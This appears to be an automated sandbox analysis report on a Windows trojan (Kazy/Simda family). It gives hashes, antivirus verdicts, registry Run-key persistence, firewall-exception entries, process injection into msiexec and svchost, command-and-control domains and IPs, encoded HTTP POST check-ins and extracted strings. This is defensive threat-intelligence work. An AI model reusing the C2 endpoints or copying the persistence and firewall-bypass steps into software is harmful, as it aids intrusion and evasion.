Analysis Date2014-11-10 17:10:26
MD51a6f13379c2ef7eb8f32b3f4b8fca416
SHA1c8a7c1788b061236a6a7aa6a9be8d912d9546936

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.rr md5: 3eea566760eae7d167141b07377a320f sha1: e54a2b7860a54d4c0491bbace6aa3e42ccdb956e size: 512
Section.bk md5: 7c3a703142155c71e5bd959a85fa27bd sha1: 55f006b4bae5935686906c612efcdba682025fee size: 2560
Section.h md5: f8a18ca2fdc49ed2c75bfc10815e10e6 sha1: ed696d08c3f1ae4c76d7bb4326581e2269cf0ea5 size: 3584
Section.nfzeiay md5: a4f9c89a166d66fbd5da35c887423ee9 sha1: 28266d584aeaf26d84136897bad38a0e373b8a0a size: 30720
Section.hzhd md5: 054750cb61ff21ce486efce77bd77221 sha1: 0bcd867ca4f2d686e1f01c4672cc165ef4e9aba1 size: 2048
Timestamp2014-05-11 21:13:45
PackerFASM v1.5x
PEhash18eee901b503840988f1dcbc67fabd7a27742309
IMPhashc959caff6dd0463afbd08d3c2e8b197c
AV360 SafeGen:Variant.Kazy.396140
AVAd-AwareGen:Variant.Kazy.396140
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)no_virus
AVBullGuardGen:Variant.Kazy.396140
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Kazy.396140
AVEset (nod32)Win32/Kryptik.CCNG
AVFortinetW32/Simda.ACR!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Kazy.396140
AVGrisoft (avg)no_virus
AVIkarusno_virus
AVK7no_virus
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Kazy.396140
AVNormanGen:Variant.Kazy.396140
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\system32\msiexec.exe

RegistryHKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list\C:\WINDOWS\system32\msiexec.exe ➝
C:\WINDOWS\system32\msiexec.exe:*:Generic Host Process\\x00
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
c:\Documents and Settings\All Users\dxirrfdaq.exe\\x00
Creates Filepipe\2872114278
Creates FilePIPE\lsarpc
Creates Filec:\Documents and Settings\All Users\dxirrfdaq.exe
Deletes Filec:\c8a7c1~1.exe
Creates Processc:\Documents and Settings\All Users\dxirrfdaq.exe

Process
↳ c:\Documents and Settings\All Users\dxirrfdaq.exe

Creates ProcessC:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list\C:\WINDOWS\system32\svchost.exe ➝
C:\WINDOWS\system32\svchost.exe:*:Generic Host Process\\x00
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSihave5kbtc.org
Winsock DNSihave5kbtc.biz
Winsock DNSroad-to-dominikana.biz
Winsock DNSroad-to-dominikana.in

Network Details:

DNSupdate.microsoft.com.nsatc.net
Type: A
65.55.138.126
DNSupdate.microsoft.com.nsatc.net
Type: A
65.55.138.186
DNSroad-to-dominikana.in
Type: A
192.42.116.41
DNSroad-to-dominikana.biz
Type: A
62.76.41.238
DNSihave5kbtc.biz
Type: A
62.76.45.30
DNSihave5kbtc.org
Type: A
62.76.41.238
DNSupdate.microsoft.com
Type: A
HTTP POSThttp://road-to-dominikana.in/a_news/stats.php
User-Agent: Mozilla/4.0
HTTP POSThttp://road-to-dominikana.biz/a_news/stats.php
User-Agent: Mozilla/4.0
HTTP POSThttp://ihave5kbtc.biz/a_news/stats.php
User-Agent: Mozilla/4.0
HTTP POSThttp://ihave5kbtc.org/a_news/stats.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1033 ➝ 65.55.138.126:80
Flows UDP192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1035 ➝ 192.42.116.41:80
Flows UDP192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1037 ➝ 62.76.41.238:80
Flows UDP192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1039 ➝ 62.76.45.30:80
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1041 ➝ 62.76.41.238:80

Raw Pcap
0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 726f6164 2d746f2d 646f6d69   st: road-to-domi
0x00000090 (00144)   6e696b61 6e612e69 6e0d0a43 6f6e7465   nikana.in..Conte
0x000000a0 (00160)   6e742d4c 656e6774 683a2037 360d0a43   nt-Length: 76..C
0x000000b0 (00176)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000c0 (00192)   2d636163 68650d0a 50726167 6d613a20   -cache..Pragma: 
0x000000d0 (00208)   6e6f2d63 61636865 0d0a0d0a 41364565   no-cache....A6Ee
0x000000e0 (00224)   39567068 316c4a6a 38493776 58426759   9Vph1lJj8I7vXBgY
0x000000f0 (00240)   34615534 496b757a 4931534c 485a6b71   4aU4IkuzI1SLHZkq
0x00000100 (00256)   4c696948 4f316468 56554654 736c3051   LiiHO1dhVUFTsl0Q
0x00000110 (00272)   52746d2b 77643648 73723852 7044732f   Rtm+wd6Hsr8RpDs/
0x00000120 (00288)   35575939 6e773d3d                     5WY9nw==

0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 726f6164 2d746f2d 646f6d69   st: road-to-domi
0x00000090 (00144)   6e696b61 6e612e62 697a0d0a 436f6e74   nikana.biz..Cont
0x000000a0 (00160)   656e742d 4c656e67 74683a20 37360d0a   ent-Length: 76..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a507261 676d613a   o-cache..Pragma:
0x000000d0 (00208)   206e6f2d 63616368 650d0a0d 0a413645    no-cache....A6E
0x000000e0 (00224)   65395670 68316c4a 6a384937 76584267   e9Vph1lJj8I7vXBg
0x000000f0 (00240)   59346155 34496b75 7a493153 4c485a6b   Y4aU4IkuzI1SLHZk
0x00000100 (00256)   714c6969 484f3164 68565546 54736c30   qLiiHO1dhVUFTsl0
0x00000110 (00272)   5152746d 2b776436 48737238 52704473   QRtm+wd6Hsr8RpDs
0x00000120 (00288)   2f355759 396e773d 3d                  /5WY9nw==

0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 69686176 65356b62 74632e62   st: ihave5kbtc.b
0x00000090 (00144)   697a0d0a 436f6e74 656e742d 4c656e67   iz..Content-Leng
0x000000a0 (00160)   74683a20 37360d0a 43616368 652d436f   th: 76..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000d0 (00208)   650d0a0d 0a413645 65395670 68316c4a   e....A6Ee9Vph1lJ
0x000000e0 (00224)   6a384937 76584267 59346155 34496b75   j8I7vXBgY4aU4Iku
0x000000f0 (00240)   7a493153 4c485a6b 714c6969 484f3164   zI1SLHZkqLiiHO1d
0x00000100 (00256)   68565546 54736c30 5152746d 2b776436   hVUFTsl0QRtm+wd6
0x00000110 (00272)   48737238 52704473 2f355759 396e773d   Hsr8RpDs/5WY9nw=
0x00000120 (00288)   3d355759 396e773d 3d                  =5WY9nw==

0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 69686176 65356b62 74632e6f   st: ihave5kbtc.o
0x00000090 (00144)   72670d0a 436f6e74 656e742d 4c656e67   rg..Content-Leng
0x000000a0 (00160)   74683a20 37360d0a 43616368 652d436f   th: 76..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000d0 (00208)   650d0a0d 0a413645 65395670 68316c4a   e....A6Ee9Vph1lJ
0x000000e0 (00224)   6a384937 76584267 59346155 34496b75   j8I7vXBgY4aU4Iku
0x000000f0 (00240)   7a493153 4c485a6b 714c6969 484f3164   zI1SLHZkqLiiHO1d
0x00000100 (00256)   68565546 54736c30 5152746d 2b776436   hVUFTsl0QRtm+wd6
0x00000110 (00272)   48737238 52704473 2f355759 396e773d   Hsr8RpDs/5WY9nw=
0x00000120 (00288)   3d355759 396e773d 3d                  =5WY9nw==


Strings
[0

!);>@@
00060;0J0g0v0
1 1K1o1~1
2"2'222H2Q2]2j2u2
3$383L3Z3`3m3w3
4(4/4<4N4_4l4t4
7|\^*G
8$8.888B8L8V8`8j8t8
8&Lz>g
9){<@@
9)3<@@
9)AAAA
9)l<@@@
9)z?@@@
>@@@,A
A)46@@
"A56jo
=AAAA@
AAAAAA
AAAA,e
AAAA,S
AABAAABAAABAAAA
A*BEAA
AbortPath
AddFontMemResourceEx
}au9a#z
CallNamedPipeA
CharUpperBuffA
CopyFileW
CreateICW
CreatePen
D7W}~V
DbgUiSetThreadDebugObject
DdEntry42
EditWndProc
EndDeferWindowPos
EndPage
EngPaint
EngTransparentBlt
ExitProcess
}F9AAA
f'9Zhw
FindFirstVolumeMountPointW
FONTOBJ_pvTrueTypeFontFile
fOwGR$
GDI32.DLL
GdiAddFontResourceW
GdiDllInitialize
GdiEntry15
GdiValidateHandle
GetAtomNameA
GetClassNameA
GetClipBox
GetCompressedFileSizeA
GetCurrentProcess
GetCurrentProcessId
GetFontUnicodeRanges
GetKeyboardLayout
GetLogicalDriveStringsA
GetModuleHandleA
GetNextDlgGroupItem
GetProcessId
GetProfileIntW
GetStringBitmapA
GetSystemRegistryQuota
GetSystemWow64DirectoryA
GetTempPathA
GetWindowRect
Gf@@AA
{.GQ-2J @
?@@@,H
H!V)`S
hXe H:o
h]$Y9:n
I)(@@@
I){@@@
I)&@@@
_i64toa
IAAA8$
I)AAAA
IA)AAAA
I)E?@@
IfAA@@,FnAABA
iGX*&%\
I)L@@@
I)Q>@@
I)s@@@
IsValidLanguageGroup
IsWow64Process
I@wOxK)k
$j!nlO
Jpg file corrupted!
J{VW5S
kernel32.dll
KillTimer
%K%Q[Q
L@7f*u$
LdrFlushAlternateResourceModules
M)4=@@@
M=AAAA#7
mJ+LK=9$
ModifyWorldTransform
mp9<Nzi
MultiByteToWideChar
@.nfzeiay
ntdll.DLL
NtNotifyChangeMultipleKeys
NtProtectVirtualMemory
NtQueryVolumeInformationFile
@@@@,O
OAAA=4
P@9ph;
Pa)9lC
Q),;@@
Qf@PAAD
QueueUserWorkItem
)r<@@D
RealGetWindowClassW
ReasonCodeNeedsBugID
RemoveFontMemResourceEx
RtlAbsoluteToSelfRelativeSD
RtlAddAccessDeniedObjectAce
RtlAllocateAndInitializeSid
RtlAreAnyAccessesGranted
RtlCreateUserProcess
RtlCreateUserThread
RtlDeNormalizeProcessParams
RtlEncodeSystemPointer
RtlExtendedIntegerMultiply
RtlExtendedMagicDivide
RtlFindClearRuns
RtlGetUnloadEventTrace
RtlInitNlsTables
RtlIpv4AddressToStringExW
RtlpUnWaitCriticalSection
RtlQueryInformationActiveActivationContext
RtlSecondsSince1980ToTime
RtlTimeToSecondsSince1970
RtlUlonglongByteSwap
RtlUnicodeStringToInteger
RtlValidateUnicodeString
RtlValidSid
s3/~30
SelectClipRgn
SetBitmapAttributes
SetBrushAttributes
SetClassLongW
SetCursorPos
SetDlgItemTextW
SetMapMode
SetShellWindow
SetTextAlign
SetVolumeLabelW
SetWindowRgn
ShowScrollBar
StartDocW
t+CJ@I
!This program cannot be run in DOS mode.
Tn"gaC
TranslateMDISysAccel
])u?@@
;&}u	fi
USER32.DLL
XLATEOBJ_cGetPalette
YJ.CQZ
ZwAddAtom
ZwCreateJobObject
ZwDeleteValueKey
ZwInitiatePowerAction
ZwLockFile
ZwProtectVirtualMemory
ZwQueryFullAttributesFile
ZwSetTimer
ZwSignalAndWaitForSingleObject
ZwWaitForDebugEvent